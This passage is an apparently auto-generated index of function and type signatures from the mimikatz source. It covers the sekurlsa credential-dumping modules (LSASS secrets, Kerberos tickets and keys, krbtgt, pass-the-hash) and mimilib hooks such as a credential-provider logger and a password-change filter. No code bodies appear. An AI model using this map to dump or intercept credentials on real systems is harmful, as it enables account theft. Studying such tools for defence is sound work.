function VOID (line 275) | VOID SymCryptDesxDecrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey,...
function VOID (line 282) | VOID SymCryptDesxEncrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey,...
function VOID (line 289) | VOID SymCryptDesxCbcDecrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedK...
function VOID (line 302) | VOID SymCryptDesxCbcEncrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedK...
function BOOL (line 313) | BOOL SymCryptRc4Init2(PSYMCRYPT_RC4_STATE pState, LPCBYTE pbKey, SIZE_T ...
function VOID (line 341) | VOID SymCryptRc4Crypt2(PSYMCRYPT_RC4_STATE pState, LPCBYTE pbSrc, PBYTE ...
FILE: mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.h
type SYMCRYPT_NT5_DES_EXPANDED_KEY (line 35) | typedef struct _SYMCRYPT_NT5_DES_EXPANDED_KEY {
type SYMCRYPT_NT5_DES_EXPANDED_KEY (line 38) | typedef const SYMCRYPT_NT5_DES_EXPANDED_KEY * PCSYMCRYPT_NT5_DES_EXPANDE...
type SYMCRYPT_NT5_DESX_EXPANDED_KEY (line 40) | typedef struct _SYMCRYPT_NT5_DESX_EXPANDED_KEY {
type SYMCRYPT_NT5_DESX_EXPANDED_KEY (line 45) | typedef const SYMCRYPT_NT5_DESX_EXPANDED_KEY * PCSYMCRYPT_NT5_DESX_EXPAN...
type SYMCRYPT_RC4_STATE (line 47) | typedef struct _SYMCRYPT_RC4_STATE {
type VOID (line 74) | typedef VOID (* PCRYPT_ENCRYPT) (PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpan...
FILE: mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt6.c
function NTSTATUS (line 40) | NTSTATUS kuhl_m_sekurlsa_nt6_init()
function NTSTATUS (line 47) | NTSTATUS kuhl_m_sekurlsa_nt6_clean()
function NTSTATUS (line 54) | NTSTATUS kuhl_m_sekurlsa_nt6_LsaInitializeProtectedMemory()
function VOID (line 91) | VOID kuhl_m_sekurlsa_nt6_LsaCleanupProtectedMemory()
function VOID (line 115) | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaProtectMemory(IN PVOID Buffer, IN ULO...
function VOID (line 120) | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(IN PVOID Buffer, IN U...
function NTSTATUS (line 125) | NTSTATUS kuhl_m_sekurlsa_nt6_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMe...
FILE: mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt6.h
type KIWI_BCRYPT_KEY8 (line 10) | typedef struct _KIWI_BCRYPT_KEY8 {
type KIWI_BCRYPT_KEY81 (line 22) | typedef struct _KIWI_BCRYPT_KEY81 {
type KIWI_BCRYPT_HANDLE_KEY (line 39) | typedef struct _KIWI_BCRYPT_HANDLE_KEY {
type KIWI_BCRYPT_GEN_KEY (line 47) | typedef struct _KIWI_BCRYPT_GEN_KEY {
FILE: mimikatz/modules/sekurlsa/globals_sekurlsa.h
type RTL_BALANCED_LINKS (line 13) | typedef struct _RTL_BALANCED_LINKS {
type RTL_AVL_TABLE (line 21) | typedef struct _RTL_AVL_TABLE {
type KIWI_GENERIC_PRIMARY_CREDENTIAL (line 35) | typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL {
type KUHL_M_SEKURLSA_LIB (line 41) | typedef struct _KUHL_M_SEKURLSA_LIB {
type KUHL_M_SEKURLSA_OS_CONTEXT (line 47) | typedef struct _KUHL_M_SEKURLSA_OS_CONTEXT {
type KUHL_M_SEKURLSA_CONTEXT (line 53) | typedef struct _KUHL_M_SEKURLSA_CONTEXT {
type NTSTATUS (line 58) | typedef NTSTATUS (* PKUHL_M_SEKURLSA_ACQUIRE_KEYS_FUNCS) (PKUHL_M_SEKURL...
type NTSTATUS (line 59) | typedef NTSTATUS (* PKUHL_M_SEKURLSA_INIT) ();
type KUHL_M_SEKURLSA_LOCAL_HELPER (line 61) | typedef struct _KUHL_M_SEKURLSA_LOCAL_HELPER {
type KIWI_BASIC_SECURITY_LOGON_SESSION_DATA (line 69) | typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
type KUHL_M_SEKURLSA_PACKAGE (line 88) | typedef struct _KUHL_M_SEKURLSA_PACKAGE {
type SEKURLSA_PTH_DATA (line 96) | typedef struct _SEKURLSA_PTH_DATA {
FILE: mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
function VOID (line 80) | VOID kuhl_m_sekurlsa_reset()
function NTSTATUS (line 112) | NTSTATUS kuhl_m_sekurlsa_process(int argc, wchar_t * argv[])
function NTSTATUS (line 119) | NTSTATUS kuhl_m_sekurlsa_minidump(int argc, wchar_t * argv[])
function NTSTATUS (line 133) | NTSTATUS kuhl_m_sekurlsa_init()
function NTSTATUS (line 139) | NTSTATUS kuhl_m_sekurlsa_clean()
function NTSTATUS (line 151) | NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t * argv[])
function NTSTATUS (line 156) | NTSTATUS kuhl_m_sekurlsa_acquireLSA()
function BOOL (line 276) | BOOL CALLBACK kuhl_m_sekurlsa_findlibs(PKULL_M_PROCESS_VERY_BASIC_MODULE...
function NTSTATUS (line 290) | NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOp...
function BOOL (line 380) | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SEC...
function kuhl_m_sekurlsa_printinfos_logonData (line 423) | void kuhl_m_sekurlsa_printinfos_logonData(IN PKIWI_BASIC_SECURITY_LOGON_...
function NTSTATUS (line 442) | NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * l...
function NTSTATUS (line 471) | NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_krbtgt_keys (line 498) | void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
function NTSTATUS (line 629) | NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
function NTSTATUS (line 694) | NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_trust_domainkeys (line 733) | void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * key...
function kuhl_m_sekurlsa_trust_domaininfo (line 773) | void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
function kuhl_m_sekurlsa_bkey (line 796) | void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKUR...
function NTSTATUS (line 862) | NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[])
function NTSTATUS (line 883) | NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
function VOID (line 1007) | VOID kuhl_m_sekurlsa_pth_luid(PSEKURLSA_PTH_DATA data)
function VOID (line 1059) | VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL...
function VOID (line 1385) | VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
function VOID (line 1433) | VOID kuhl_m_sekurlsa_genericKeyOutput(PKIWI_CREDENTIAL_KEY key, LPCWSTR ...
function BOOL (line 1464) | BOOL kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob, LPBYTE ...
function VOID (line 1477) | VOID kuhl_m_sekurlsa_genericEncLsaIsoOutput(PENC_LSAISO_DATA_BLOB blob, ...
FILE: mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
type _KIWI_CREDENTIAL_KEY (line 71) | struct _KIWI_CREDENTIAL_KEY
type _LSAISO_DATA_BLOB (line 72) | struct _LSAISO_DATA_BLOB
type _ENC_LSAISO_DATA_BLOB (line 73) | struct _ENC_LSAISO_DATA_BLOB
type _KDC_DOMAIN_KEYS_INFO (line 78) | struct _KDC_DOMAIN_KEYS_INFO
type _KDC_DOMAIN_INFO (line 79) | struct _KDC_DOMAIN_INFO
type KUHL_M_SEKURLSA_ENUM_HELPER (line 92) | typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
type KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA (line 106) | typedef struct _KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA {
type KIWI_KRBTGT_CREDENTIAL_64 (line 111) | typedef struct _KIWI_KRBTGT_CREDENTIAL_64 {
type KIWI_KRBTGT_CREDENTIALS_64 (line 121) | typedef struct _KIWI_KRBTGT_CREDENTIALS_64 {
type KIWI_KRBTGT_CREDENTIAL_6 (line 130) | typedef struct _KIWI_KRBTGT_CREDENTIAL_6 {
type KIWI_KRBTGT_CREDENTIALS_6 (line 139) | typedef struct _KIWI_KRBTGT_CREDENTIALS_6 {
type KIWI_KRBTGT_CREDENTIAL_5 (line 148) | typedef struct _KIWI_KRBTGT_CREDENTIAL_5 {
type KIWI_KRBTGT_CREDENTIALS_5 (line 156) | typedef struct _KIWI_KRBTGT_CREDENTIALS_5 {
type DUAL_KRBTGT (line 163) | typedef struct _DUAL_KRBTGT {
type KDC_DOMAIN_KEY (line 168) | typedef struct _KDC_DOMAIN_KEY {
type KDC_DOMAIN_KEYS (line 174) | typedef struct _KDC_DOMAIN_KEYS {
type KDC_DOMAIN_KEYS_INFO (line 181) | typedef struct _KDC_DOMAIN_KEYS_INFO {
type KDC_DOMAIN_INFO (line 187) | typedef struct _KDC_DOMAIN_INFO {
type LSAISO_DATA_BLOB (line 206) | typedef struct _LSAISO_DATA_BLOB {
type ENC_LSAISO_DATA_BLOB (line 225) | typedef struct _ENC_LSAISO_DATA_BLOB {
FILE: mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.c
function BOOL (line 12) | BOOL kuhl_m_sekurlsa_sk_candidatekey_add(BYTE key[32], DOUBLE entropy)
function kuhl_m_sekurlsa_sk_candidatekey_delete (line 33) | void kuhl_m_sekurlsa_sk_candidatekey_delete(PKEYLIST_ENTRY entry)
function kuhl_m_sekurlsa_sk_candidatekey_descr (line 43) | void kuhl_m_sekurlsa_sk_candidatekey_descr(PKEYLIST_ENTRY entry)
function kuhl_m_sekurlsa_sk_candidatekeys_delete (line 53) | void kuhl_m_sekurlsa_sk_candidatekeys_delete()
function kuhl_m_sekurlsa_sk_candidatekeys_descr (line 63) | void kuhl_m_sekurlsa_sk_candidatekeys_descr()
function DOUBLE (line 71) | DOUBLE normalizedEntropy(LPCBYTE data, DWORD len)
function DWORD (line 88) | DWORD kuhl_m_sekurlsa_sk_search(PBYTE data, DWORD size, BOOL light)
function DWORD (line 116) | DWORD kuhl_m_sekurlsa_sk_search_file(LPCWSTR filename)
function NTSTATUS (line 149) | NTSTATUS kuhl_m_sekurlsa_sk_bootKey(int argc, wchar_t* argv[])
function NTSTATUS (line 201) | NTSTATUS kuhl_m_sekurlsa_sk_tryDecodeKey(LPBYTE Key, DWORD cbKey, PLSAIS...
function BOOL (line 206) | BOOL kuhl_m_sekurlsa_sk_tryDecode(PLSAISO_DATA_BLOB blob, PBYTE *output,...
FILE: mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_sk.h
type KEYLIST_ENTRY (line 11) | typedef struct _KEYLIST_ENTRY {
FILE: mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
function BOOL (line 56) | BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL...
function BOOL (line 62) | BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsas...
function PVOID (line 127) | PVOID kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(PKULL_M_MEMORY_ADDRESS...
function PVOID (line 158) | PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuid(PKULL_M_MEMORY_ADDRESS pTable...
function PVOID (line 172) | PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTa...
FILE: mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
type KIWI_MSV1_0_PRIMARY_CREDENTIALS (line 21) | typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
type KIWI_MSV1_0_CREDENTIALS (line 27) | typedef struct _KIWI_MSV1_0_CREDENTIALS {
type KIWI_MSV1_0_LIST_51 (line 33) | typedef struct _KIWI_MSV1_0_LIST_51 {
type KIWI_MSV1_0_LIST_52 (line 55) | typedef struct _KIWI_MSV1_0_LIST_52 {
type KIWI_MSV1_0_LIST_60 (line 76) | typedef struct _KIWI_MSV1_0_LIST_60 {
type KIWI_MSV1_0_LIST_61 (line 113) | typedef struct _KIWI_MSV1_0_LIST_61 {
type KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ (line 149) | typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
type KIWI_MSV1_0_LIST_62 (line 186) | typedef struct _KIWI_MSV1_0_LIST_62 {
type KIWI_MSV1_0_LIST_63 (line 231) | typedef struct _KIWI_MSV1_0_LIST_63 {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
function NTSTATUS (line 25) | NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_cloudap (line 30) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
type KIWI_CLOUDAP_CACHE_UNK (line 14) | typedef struct _KIWI_CLOUDAP_CACHE_UNK {
type KIWI_CLOUDAP_CACHE_LIST_ENTRY (line 39) | typedef struct _KIWI_CLOUDAP_CACHE_LIST_ENTRY {
type KIWI_CLOUDAP_LOGON_LIST_ENTRY (line 68) | typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
type KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 (line 80) | typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
type KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 (line 95) | typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.c
function NTSTATUS (line 11) | NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_credman (line 43) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_credman.h
type CREDMAN_INFOS (line 14) | typedef struct _CREDMAN_INFOS {
type KIWI_CREDMAN_LIST_ENTRY_5 (line 23) | typedef struct _KIWI_CREDMAN_LIST_ENTRY_5 {
type KIWI_CREDMAN_LIST_ENTRY_60 (line 42) | typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
type KIWI_CREDMAN_LIST_ENTRY (line 66) | typedef struct _KIWI_CREDMAN_LIST_ENTRY {
type KIWI_CREDMAN_LIST_STARTER (line 91) | typedef struct _KIWI_CREDMAN_LIST_STARTER {
type KIWI_CREDMAN_SET_LIST_ENTRY (line 97) | typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.c
function NTSTATUS (line 46) | NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
function BOOL (line 52) | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURIT...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_dpapi.h
type KIWI_MASTERKEY_CACHE_ENTRY (line 14) | typedef struct _KIWI_MASTERKEY_CACHE_ENTRY {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
function NTSTATUS (line 349) | NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_kerberos (line 354) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASI...
function NTSTATUS (line 360) | NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[])
function NTSTATUS (line 368) | NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[])
function BOOL (line 375) | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BA...
function kuhl_m_sekurlsa_enum_kerberos_callback_passwords (line 381) | void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_...
function kuhl_m_sekurlsa_enum_kerberos_callback_tickets (line 417) | void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BA...
function kuhl_m_sekurlsa_enum_kerberos_callback_keys (line 432) | void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC...
function kuhl_m_sekurlsa_enum_kerberos_callback_pth (line 463) | void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_...
function BOOL (line 573) | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_...
function kuhl_m_sekurlsa_enum_generic_callback_kerberos (line 586) | void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECUR...
function kuhl_m_sekurlsa_kerberos_enum_tickets (line 609) | void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON...
function wchar_t (line 679) | wchar_t * kuhl_m_sekurlsa_kerberos_generateFileName(PLUID LogonId, const...
function PKIWI_KERBEROS_TICKET (line 700) | PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicke...
function kuhl_m_sekurlsa_kerberos_createExternalName (line 742) | void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pE...
function kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer (line 768) | void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BU...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
type KIWI_KERBEROS_ENUM_DATA (line 20) | typedef struct _KIWI_KERBEROS_ENUM_DATA {
type KERB_INFOS (line 43) | typedef struct _KERB_INFOS {
type KERB_SMARTCARD_CSP_INFO_5 (line 82) | typedef struct _KERB_SMARTCARD_CSP_INFO_5 {
type KERB_SMARTCARD_CSP_INFO (line 92) | typedef struct _KERB_SMARTCARD_CSP_INFO {
type KIWI_KERBEROS_CSP_INFOS_5 (line 108) | typedef struct _KIWI_KERBEROS_CSP_INFOS_5 {
type KIWI_KERBEROS_CSP_INFOS_60 (line 122) | typedef struct _KIWI_KERBEROS_CSP_INFOS_60 {
type KIWI_KERBEROS_CSP_INFOS_62 (line 136) | typedef struct _KIWI_KERBEROS_CSP_INFOS_62 {
type KIWI_KERBEROS_CSP_INFOS_10 (line 150) | typedef struct _KIWI_KERBEROS_CSP_INFOS_10 {
type KIWI_KERBEROS_LOGON_SESSION_51 (line 164) | typedef struct _KIWI_KERBEROS_LOGON_SESSION_51 {
type KIWI_KERBEROS_LOGON_SESSION (line 202) | typedef struct _KIWI_KERBEROS_LOGON_SESSION {
type KIWI_KERBEROS_10_PRIMARY_CREDENTIAL (line 242) | typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL
type KIWI_KERBEROS_LOGON_SESSION_10 (line 250) | typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
type KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO (line 294) | typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO
type KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607 (line 300) | typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607
type KIWI_KERBEROS_LOGON_SESSION_10_1607 (line 312) | typedef struct _KIWI_KERBEROS_LOGON_SESSION_10_1607 {
type KIWI_KERBEROS_INTERNAL_TICKET_51 (line 356) | typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_51 {
type KIWI_KERBEROS_INTERNAL_TICKET_52 (line 391) | typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_52 {
type KIWI_KERBEROS_INTERNAL_TICKET_60 (line 424) | typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_60 {
type KIWI_KERBEROS_INTERNAL_TICKET_6 (line 458) | typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
type KIWI_KERBEROS_INTERNAL_TICKET_10 (line 492) | typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_10 {
type KIWI_KERBEROS_INTERNAL_TICKET_10_1607 (line 527) | typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_10_1607 {
type KERB_HASHPASSWORD_GENERIC (line 564) | typedef struct _KERB_HASHPASSWORD_GENERIC {
type KERB_HASHPASSWORD_5 (line 570) | typedef struct _KERB_HASHPASSWORD_5 {
type KERB_HASHPASSWORD_6 (line 575) | typedef struct _KERB_HASHPASSWORD_6 {
type KERB_HASHPASSWORD_6_1607 (line 581) | typedef struct _KERB_HASHPASSWORD_6_1607 {
type KIWI_KERBEROS_KEYS_LIST_5 (line 588) | typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
type KIWI_KERBEROS_KEYS_LIST_6 (line 596) | typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
type KIWI_KERBEROS_ENUM_DATA_TICKET (line 606) | typedef struct _KIWI_KERBEROS_ENUM_DATA_TICKET {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.c
function NTSTATUS (line 25) | NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_livessp (line 30) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_livessp.h
type KIWI_LIVESSP_PRIMARY_CREDENTIAL (line 14) | typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
type KIWI_LIVESSP_LIST_ENTRY (line 21) | typedef struct _KIWI_LIVESSP_LIST_ENTRY
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
function NTSTATUS (line 15) | NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_msv (line 20) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SEC...
function BOOL (line 25) | BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKUHL_M_SEKU...
function BOOL (line 37) | BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKU...
function BOOL (line 82) | BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECUR...
function VOID (line 95) | VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, I...
function MSV1_0_PRIMARY_HELPER (line 137) | const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLS...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.h
type MSV1_0_PRIMARY_CREDENTIAL (line 12) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
type MSV1_0_PRIMARY_CREDENTIAL_10_OLD (line 24) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD {
type MSV1_0_PRIMARY_CREDENTIAL_10 (line 39) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
type MSV1_0_PRIMARY_CREDENTIAL_10_1607 (line 56) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_1607 {
type MSV1_0_PRIMARY_HELPER (line 80) | typedef struct _MSV1_0_PRIMARY_HELPER {
type MSV1_0_PTH_DATA_CRED (line 95) | typedef struct _MSV1_0_PTH_DATA_CRED {
type MSV1_0_STD_DATA (line 100) | typedef struct _MSV1_0_STD_DATA {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.c
function NTSTATUS (line 36) | NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_ssp (line 41) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SEC...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_ssp.h
type KIWI_SSP_CREDENTIAL_LIST_ENTRY (line 14) | typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c
function NTSTATUS (line 36) | NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_tspkg (line 46) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_S...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.h
type KIWI_TS_PRIMARY_CREDENTIAL (line 14) | typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
type KIWI_TS_CREDENTIAL (line 19) | typedef struct _KIWI_TS_CREDENTIAL {
type KIWI_TS_CREDENTIAL_1607 (line 31) | typedef struct _KIWI_TS_CREDENTIAL_1607 {
type KIWI_TS_CREDENTIAL_HELPER (line 43) | typedef struct _KIWI_TS_CREDENTIAL_HELPER {
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c
function NTSTATUS (line 42) | NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
function kuhl_m_sekurlsa_enum_logon_callback_wdigest (line 47) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC...
FILE: mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.h
type KIWI_WDIGEST_LIST_ENTRY (line 14) | typedef struct _KIWI_WDIGEST_LIST_ENTRY {
FILE: mimilib/kappfree.c
function kappfree_startW (line 8) | void CALLBACK kappfree_startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmd...
FILE: mimilib/kcredentialprovider.c
function NTSTATUS (line 55) | NTSTATUS NTAPI kredentialProvider_log(PWSTR szDomain, PWSTR szLogin, PWS...
function HRESULT (line 70) | HRESULT STDMETHODCALLTYPE GetSerializationNew(IUnknown* This, /* [out] *...
function HRESULT (line 162) | HRESULT CEIDProvider_CreateInstance(REFIID riid, void** ppv)
function ULONG (line 195) | ULONG STDMETHODCALLTYPE CClassFactoryAddRef(__RPC__in IClassFactory* This)
function ULONG (line 200) | ULONG STDMETHODCALLTYPE CClassFactoryRelease(__RPC__in IClassFactory* This)
function HRESULT (line 211) | HRESULT STDMETHODCALLTYPE CClassFactoryQueryInterface(IClassFactory* Th...
function HRESULT (line 236) | HRESULT STDMETHODCALLTYPE CClassFactoryCreateInstance(IClassFactory* Thi...
function HRESULT (line 255) | HRESULT STDMETHODCALLTYPE CClassFactoryLockServer(IClassFactory* This, /...
function HRESULT (line 277) | HRESULT CClassFactory_CreateInstance(REFCLSID rclsid, REFIID riid, void*...
function STDAPI (line 299) | STDAPI kcredentialprovider_DllGetClassObject(REFCLSID rclsid, REFIID rii...
function STDAPI (line 304) | STDAPI kcredentialprovider_DllCanUnloadNow()
FILE: mimilib/kcredentialprovider.h
type CREDENTIAL_PROVIDER_CREDENTIAL_SERIALIZATION (line 15) | typedef struct _CREDENTIAL_PROVIDER_CREDENTIAL_SERIALIZATION {
type ICredentialProviderCredentialVtbl (line 22) | typedef struct ICredentialProviderCredentialVtbl {
type ICredentialProviderCredential (line 47) | typedef struct ICredentialProviderCredential {
type ICredentialProviderVtbl (line 51) | typedef struct ICredentialProviderVtbl {
type ICredentialProvider (line 67) | typedef struct ICredentialProvider {
type CClassFactory (line 78) | typedef struct _CClassFactory {
FILE: mimilib/kdhcp.c
function BOOL (line 11) | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID ...
function DWORD (line 18) | DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWOR...
function DWORD (line 39) | DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD ...
FILE: mimilib/kdns.c
function DWORD (line 8) | DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllo...
function DWORD (line 13) | DWORD WINAPI kdns_DnsPluginCleanup()
function DWORD (line 18) | DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PST...
FILE: mimilib/kfilt.c
function BOOLEAN (line 8) | BOOLEAN NTAPI kfilt_InitializeChangeNotify(void)
function NTSTATUS (line 13) | NTSTATUS NTAPI kfilt_PasswordChangeNotify(PUNICODE_STRING UserName, ULON...
FILE: mimilib/knp.c
